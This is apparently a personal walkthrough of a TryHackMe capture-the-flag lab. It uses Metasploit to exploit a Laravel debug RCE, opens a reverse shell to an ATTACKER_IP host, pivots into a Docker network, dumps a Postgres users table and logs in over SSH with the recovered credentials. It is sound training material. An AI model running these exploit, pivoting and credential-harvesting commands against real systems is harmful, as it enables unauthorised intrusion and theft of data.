Dock The Halls
Overall Thoughts
This was a great day int the Advent of Cyber. Pivoting is a technique that I still struggle with and it was great to see the challenge today helping to teach me more of that. As well as more use of Metasploit which is one of the best frame works for Penetration testing. I am so happy the challenge involved a few sessions and how to bounce back and forth with them and how to use each sessions to deploy payloads through.
Getting Started
Today TryHackMe had us use the Kali Linux vm so after getting that set up I went ahead and deployed the room as normal. Kali linux is not new to me but I do like the fact that TryHackMe is exposing new people to both Parrot and Kali.
Getting Started
The first thing we should do is scan the IP address of the target machine.
Everyone has their normal flags they use for scanning but today I used the flags that the instructions provide the command to nmap scan is as follows
nmap -T4 -A -Pn TargretIPAddress
Lets explain the flags they used
- -T0 through -T5
- Timing Template -T0 being the slowest scan -T5 being the fastest most aggressive scan
- -A
- Enavle OS detection, version detection, script scanning, and traceroute
- -Pn
- Disables host discovery conducts port scan only
Here are the results of the scan
Question 1
The Nmap Scan will get us the answer to question 1
Checking things out
Now we know that the target machine is running a webserver on port 80 we can open our web browser and visit the site. After some poking around we find an interesting cookie
googling we can find that the application that uses that set-cookie could be vulnerable to remote code execution. The easiest way to verify if the application is vulnerable is to use Metasploit to check. So we start up Metasploit with this command
Once Metasploit loads we can search for the applicaiton
msf6 > search laravel
then we load the module with the use command
msf6 > use multi/php/ignition_laravel_debug_rce
now we can run the check command
msf6 exploit(multi/php/ignition_laravel_debug_rce) > check rhost=TargtIPAddress
it appears to be vulnerable
Question 2
That confirms the answer to question 2
Question 3
You can look up the info of the vulnerabiliy to get the CVE number for question 3
now lets run this with the info we have
run rhost= lhost=ATTACKER_IP HttpClientTimeout=20
we have a shell
it is not a very strong shell so lets back ground it and try to upgrade it to a Meterpreter shell
here are the commands to do so
Question 4
sessions -u -1
now if we run the sessions command we ca see we have 2 sessions
Interacting with Meterpreter
Lets use the session that has the Meterpreter shell
sessions -i sessionID
Question 5
looking around there is a specific file that lets us know this is a docker environment
Question 6
Take a look around and you will find the credentials file
### Navigating postgres Now looking at the file we can see it looks like a postgres database is being run and we have the credentials for it. lets try to dump the schema of the data base
First we are going to background the Meterpreter session so we can add some route to use
route add 2
and 2
now let look for a function in Metasploit that can help us
then we are going to search for postgres
msf6 > search postgres
looking through the options we have
16 auxiliary/scanner/postgres/postgres_schemadump
We are going to use that so we use the command
use 16
we show options and set the required options. In this case we just need to set the Rhost
msf6 auxiliary(scanner/postgres/postgres_schemadump) > set rhost
now we can see that the info is dumped out and we can see a table called users that has a username and a password column. This is very interesting lets try to get the information out of that
Question 7
Getting SQL info
We are going to keep using Metasploit
searching for postgres we see an option for Generic Query lets use that
showing the options we have some things to set
set rhost
set database postgres
set sql "select * from users"
now we can run it and we get santas password
Question 8
Setting up proxychains
Next we are going to use sock proxy to be able to nmap scan the other machine in the docker environment. It is best to follow the instructions in the room but once done you get and NMAP scan results.
Question 9
Metasploit SSH login
Now that we know SSH is on open and we have some credientials we can use metasploit to SSH into what I am hoping is the root server
use auxiliary/scanner/ssh/ssh_login
the options needing to be set
set username santa
set password p4$$w0rd
set rhost
once those are all set we can run the exploit. Once complete we can run the sessions command and see we have a new session with SSH
Lets interact with that session
sessions -i 3
Question 10
Having a look around we can find the flag
Overall great room took longer than expected but still a great lesson on getting to one machine through another.